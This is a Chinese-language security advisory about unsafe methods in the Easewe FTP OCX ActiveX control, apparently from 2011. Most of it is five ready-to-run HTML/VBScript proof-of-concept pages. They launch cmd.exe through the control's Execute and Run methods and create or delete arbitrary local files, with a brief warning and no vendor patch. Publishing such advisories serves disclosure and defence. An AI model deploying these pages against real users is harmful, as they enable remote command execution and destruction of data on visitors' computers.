安全研究
安全漏洞
Easewe FTP OCX ActiveX控件"EaseWeFtp.ocx"多个不安全方法漏洞
发布日期:2011-01-22
更新日期:2011-01-22
受影响系统:
Easewe Easewe FTP OCX ActiveX Control 4.5.0.9描述:
BUGTRAQ ID: 48393
Easewe FTP OCX是简单易用的ftp activex组件,支持所有标准ftp功能。
Easewe FTP OCX在EaseWeFtp.ocx的实现上存在多个不安全方法,远程攻击者可利用此漏洞执行未授权操作或执行任意代码,造成完全控制受影响计算机。
<*来源:High-Tech Bridge SA (http://www.htbridge.ch/)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>
2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>
3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub
</script>
</html>
4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub
</script>
</html>
5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>
建议:
厂商补丁:
Easewe
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ftpocx.com/
浏览次数:3119
严重程度:0(网友投票)
绿盟科技给您安全的保障